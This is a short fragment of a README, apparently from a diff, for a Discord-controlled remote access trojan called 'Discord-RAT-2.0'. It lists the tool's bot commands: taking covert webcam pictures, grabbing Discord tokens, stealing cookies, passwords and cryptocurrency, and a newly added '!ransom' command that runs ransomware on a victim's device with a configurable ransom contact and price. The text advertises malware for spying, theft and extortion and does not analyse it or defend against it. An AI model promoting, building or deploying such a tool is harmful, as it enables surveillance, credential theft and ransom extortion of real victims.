CryptoChristian12/Discord-RAT-2.0/README.md

 --> !webcampic = Take a picture out of the selected webcam --> !grabtokens = Grab all discord tokens on the current pc --> !steal = Steals all the information from the device (cookies, passwords, crypto,...)
+--> !ransom = Runs a ransomware script on target's device (Add email you want the target to email to for his key, price and message can be configured in script)
 --> !help = This help menu

 ```